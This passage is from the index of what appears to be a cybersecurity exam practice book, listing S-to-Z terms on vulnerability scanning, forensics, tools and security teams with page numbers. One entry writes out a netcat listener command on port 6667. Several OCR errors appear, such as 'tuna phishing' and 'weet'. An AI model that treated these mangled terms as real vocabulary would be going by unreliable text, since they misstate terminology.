injection attack, 67, 82, 95, 126, 316, 
320, 326, 335 
blind injection, 71 
database access, 75 
IPS blocking, 336 
OWASP, 200 
remediation, 137 
vulnerability, 226-227 
TCP ports, 321 
SQL injection vulnerability, 335 
SQLite, Chrome forensic information, 359 
Squert, 143, 184 
SSH, login failure, 373 
ssh, access behind firewall, 47 
ssh scans, 319 
SSHA password storage, 395 
sshd, PermitRootLogin, 309 
sshd daemon, 396 
SSID detection, 354, 364 
SSL (Secure Sockets Layer), 395 
VPN connections, 335 
ssl-request-log file, 244 
StackProtect, 360 
stateful packet inspection firewalls, 326 
static analysis, 176, 312, 386 
static libraries, 151 
steganography, stegdetect, 314 
stegdetect, 314 
stolen devices, 202 
storage, volatility, 365 
Storm botnet, 373 
stress testing, 383, 384 
strings command, 313 
Strings tool, 314 
Stuxnet attack, 160 
succession planning, 384, 393 
sudo command, 203, 380 
Super Timeline, 366 
symmetric cryptography, 383 
SYN cookies, 314 
SYN floods, 20 
SYN-ACK, 20 


Sysinternals suite, 163, 186, 215, 354 
directory permissions, 140 
permissions, 217 
Process Explorer, 195 

syslog 
port scans, 18 
severity, 395 
severity level alerts, 242 

Sysmon, 385 

system binary kits, 367 

system configuration settings, 115 

system hardening, 20 
MBSA, 31 

System log, 358 

system restore, 142, 370 
validation, 171 

system speed, 124 


T 


TACACS, 385 
TACACS+, 385, 394 
tag-outs, 21 
Tamper Data, 387 
tarpits, 49 
task scheduling, Windows, 315 
TCP ports 
1433, 39, 42 
1434, 42 
1812, 45 
1813, 45 
IRC, 321 
listening, 31 
Microsoft SQL servers, 322 
Oracle, 321 
SQL, 321 
VNC, 321 
TCP SYN scan, 310, 319 
tcpdump, 388 
teams, 160 
black team, 5, 323 
blue team, 5, 10, 38, 309, 323, 330 
cybersecurity exercises, 45 


defending team, 61 

red team, 5, 11, 38, 309, 320, 323, 330 

white team, 309, 323, 330 
technical architecture, 386 
technical control review, 15 
Technical Report, 66, 331, 346, 350 
telnet, 310 

blocking, 331 

disabling, 331 

securing, 20 

service validation and, 316 
terminated users, 206, 212 
test systems, 352 
testing 

automated, 219 

environment, 135, 216, 353, 386 

final, 227 

hardware, 212 

load testing, 383, 384 

mutation, 395 

penetration, 2, 4 

regression testing, 394, 397 

stress testing, 383, 384 

UAT (user acceptance testing), 389 
text-to-speech, 368 
TheHarvester, 313, 320 
threat management review, 1-61 

answers, 308-330 
threats 

adversarial, 329 

categories, 58, 153 

slow downs, 177 

honeynet, 5 
timelines, Super Timeline, 366 
timestamps, Chrome, 371 
TippingPoint, 378, 384 
TLS (Transport Layer Security), 347, 395 

Chrome, 210 

most used, 242 

public key cryptography, 383 
TLS encryption, HTTPS, 315 
TOGAF Architecture Development Model, 

218, 386 

token-based authentication, 323 
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tool set review, 193-250 
answers, 377-399 
tool-assisted reviews, 377 
top command, 327 
Top Secret, US classification levels, 381 
topology maps, 15 
traceroute, 7, 52, 209, 228-229, 326, 385, 390 
trade secrets, 169, 367 
trademarks, 169, 367 
traffic 
detection, 174 
ifconfig, 363 
iptables rule, 47 
live graph, 186, 187 
netflows, 34 
outbound packets, 368 
peap file, 33 
Wireshark, 196, 200, 235 
traffic patterns 
flow logs, 360 
network flows and, 315 
sudden resumption, 360 
trend analysis, 40, 321 
trend-based detection, 3 
Tripwire, 30, 313 
Trojans, 324 
Truman, 373 
Trusted Access Program, 34 
Trusted Foundry program (DoD), 34, 52, 319 
Trusted Suppliers, 34 
tuna phishing, 30 
two-factor authentication, 171 
two-person control, 213, 384-385 


U 


UAT (user acceptance testing), 389, 394 
Ubuntu 

apt command, 358 

rogue services, 44 

update history, 151 

upstart, 323 
UDP scans, 322 


440 Unix — vulnerabilities 


Unix 
nc -k -1 6667, 181 
user account information, 322 
Unknown Device Report, 66, 331, 350 
US classification levels, 204 
Confidential, 381 
Secret, 381 
Top Secret, 381 
USB devices 
first use, 184 
forensics, 166 
multi-interface drive adapter, 376 
setupapi file, 373 
user accounts 
added, 42 
creation log, 143 
date created, 151 
Linux, age, 176 
new, 163 
removal, 382 
terminated users, 206, 212 


V 


vacation, mandatory, 381, 385 
validation 

post-rebuild, 143 

process, 145 

sanitization, 160 

system restore, 171 
validation phase, 355 

logging verification, 355 

patching, 355 

permissions, 355 

scanning, 355 
/var/log/auth.log, 26-27 
vendor application accounts, 217 
virtual machines 

capture, 148 

forensics, 154 

malware testing, 183 

suspending, 359 
virtualization environment, 114 


virtualization platforms, 346, 353 
external host, 117 
management, 106 
monitoring, 106 
scanner exposure, 137 

virtualized systems, 333 
patches, 71 

VirusTotal, 319, 374 
results, 172 

visitor logs, reviews, 379 

VLANs, 377 

VM escape attacks, 330 

VMware, 332 

VNC, TCP ports, 321 

volatility 
listing, 180 
media, 371 

VPN links, IPsec, 335 

VPNs (virtual private networks), 377, 

395,597 
insecure cipher support removal, 86 
protocols triggering vulnerability scan 
alert, 79 
site-to-site, 239 

vulnerabilities 
attacker’s eye view, 342 
blind SQL injection attack, 71 
buffer overflow, 105 
BYOD, 111 
cleartext logins, 94 
correcting, 64 
databases, 79, 94, 121-122 
emergency change, 103 
firmware, 65 
FTP server access, 118 
highest-severity, 111, 115, 347 
high-priority, 346 
Info level, 341 
information confidentiality, 120 
information disclosure, 110 
insider threats, 101 
internal hosts, 80-81 
Internet Explorer 8, 105 
IPS alerts, scans and, 382 
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laptops, 69 
mail server, 83 
NetBIOS name conflict, 90 
network interconnection, 120 
operating system settings and, 100 
Oracle Database TNS Listener Poison 
Attack, 347 
phpinfo information disclosure, 128 
printers, 103 
priorities, 65, 98 
publicly available information, 15 
Rational ClearCase Portscan Denial of 
Service, 347 
remediation, 76, 84-85, 338 
prioritizing, 78, 81, 84, 89, 100-101, 
104, 107, 108, 111, 116, 125 
team member, 83 
templates, 118 
remote code execution, 125 
reporting, 78, 112 
search appliance, 136 
sensor network, 71 
signature verification failed, 126-127 
signed certificate weak hashing 
algorithm, 130-131 
significant, 136 
source information, 216 
SQL injection attack, 226-227 
unpatchable, 103 
unsupported installation detection, 121 
web servers, 86 
workarounds, 102 
zero-day, 124 
vulnerability management, 245 
bandwidth and, 123 
escalation, 135 
remediation criteria, 132 
vulnerability management review, 64-138 
answers, 330-353 
vulnerability report, impact statement, 338 
vulnerability scans, 219, 319, 333 
aborting, 137 
agent-based scanning, 73 
Apache server, 89 


CIFS files, 113 
Class C network, 88 
configuration changes, 129 
correction services, 68 
credentialed scanning, 73, 132 
DMZ, 102 
documentation, 116 
external, 77, 127 
false positives, 72 
false-positives, 89 
frequency, 73, 91 

minimum, 136 
High Severity Report, 66, 331, 350 
incomplete, 107 
initial, 119 
initial steps, 97 
initial toolset, 245 
internal, 77 
jumpbox, 113 
laptops, 64 
large networks, 130 
low severities only, 99 
old scanners, 82 
operating system, 68 
patches, 68 
prior to meeting, 122 
QualysGuard, 109 
reporting, 66, 126, 128 
scanner requirements, 99 
SCAP components, 65 
scheduling, 84, 137 
server-based scanning, 73 
SharePoint service, 70-71 
signature collision, 93 
SQL injection attack, 82, 92 
system configuration settings, 115 
system speed and, 72 
TCP/IP timestamps, 100 
Technical Report, 66, 331, 346, 350 
uncredentialed scanning, 73 
Unknown Device Report, 66, 331, 350 
update frequency, 115 
updating, 345 


virtualization environment, 79 
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W 


Wapiti, 375 
waterfall model, 390, 397 
Wayback Machine, 310 
web applications 
security, 227, 249 
firewalls, 232 
priorities, 204 
SQL backend identification, 134-135 
web proxy servers, 214 
page loading speed, 385 
web server, 86 
logs, 24 
ports, 331 
printers, 342 
securing, 20 
web-based attacks, 356 
websites 
availability in equipment failure, 199 
historic versions, 9 
pop-up messages, 207 
weet, 310 
whaling, 30, 318, 376 
which command, 324 
white team, 309, 323, 330 
whitelisting, 321 
whoami command, 321 
WHOIS, 318, 320 
NIC choice, 31 
technical impact category, 59 
Windows 
command history recovery, 181 
disk filling up, 186 
memory protection methodology, 156 
server, 97 
services 
list, 53 
sc command, 329 
system restore point, 176 
task scheduling, 315 


Windows registry 
\HKEY_LOCAL_MACHINE 
SOFTWAREMicrosoftWindowsNT 
CurrentVersionWinlogin, 150 
wireless networks, 359 
Windows Task Manager, high CPU 
utilization, 152 
WinRAR, 92 
wired networks, 41 
wireless networks, 41 
listing, 154 
security tools, 241 
Windows registry, 359 
Wireshark, 16, 38, 200, 235, 313, 314, 320, 
329, 343, 356 
packet captures, 44 
traffic, 196 
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XCCDF (Extensible Configuration Checklist 
Description Format), 331, 350 
xinetd, 369 


ZAP, 375, 387, 390 
Zenmap scan, 25, 317, 320 
Zenmap topology view, 37 
zero wipe, 312 
zero-day attacks, cloud-based services, 
249 
zero-day integer overflow attack, 
121 
zero-day malware, 376 
detection methods, 2 
patching and, 361 
zero-day threats, 159 
zero-day vulnerabilities, 
124 
.zip files, 371 
zone transfer, 319 
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